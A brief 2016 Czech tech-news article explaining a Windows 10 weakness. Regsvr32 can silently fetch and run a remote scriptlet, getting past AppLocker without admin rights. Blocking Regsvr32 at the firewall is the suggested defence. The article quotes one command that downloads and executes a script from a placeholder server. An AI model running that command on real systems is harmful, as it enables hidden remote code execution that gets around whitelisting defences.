Hlavní navigace

Chyba ve Windows 10 umožňuje spustit aplikaci bez vědomí uživatele

2. 5. 2016
Doba čtení: 1 minuta

Sdílet

Těžko si představit, jak je možné, že v nejnovějších Windows můžete na dálku spustit jakoukoliv aplikaci bez vědomí uživatele.

Pokud na počítači s Windows 10 použijete Regsvr32, abyste spustili soubor uložený na vzdáleném systému, podaří se vám to. Bez vědomí uživatele, bez varování před instalací a bude ignorován i případný blacklist (AppLocker). Není potřeba mít práva správce ani nic dalšího. Jediná obrana zatím spočívá v zablokování Regsvr32 na úrovni firewallu (a také Regsvr64).

Důležité je, abyste tuhle zranitelnost pochopili správně – neznamená, že někdo může na dálku na vašem počítači něco spustit. Znamená, že pokud vás (uživatele) někdo přesvědčí ke kliknutí na něco nevhodného, může tím dojít ke spuštění a instalaci čehokoliv, aniž byste si uvědomili, že k něčemu takovému došlo. 

Tipy C

Podmínkou samozřejmě je, že něco spustíte (což uživatelé dělají rádi), a také to, že bude dostupný vzdálený systém, který se postará o dodání skriptu. Ten už se pak postará o zbytek.

Podrobnosti přímo od objevitele chyby najdete v Bypass Application Whitelisting Script Protections – Regsvr32.exe & COM Scriptlets (.sct files) a v zásadě stačí použít něco jako „regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll“, ale až tak jednoduché to samozřejmě není. Kompletní proof of concept prozradí více.

Byl pro vás článek přínosný?

Autor článku

Konzultant a publicista, provozuje www.pooh.cz. Podle některých si myslí, že rozumí všemu, sám je však přesvědčen o pravém opaku a ani v 30+ letech nedokázal přijít na to, jak mít peníze a nepracovat.
Upozorníme vás na články, které by vám neměly uniknout (maximálně 2x týdně).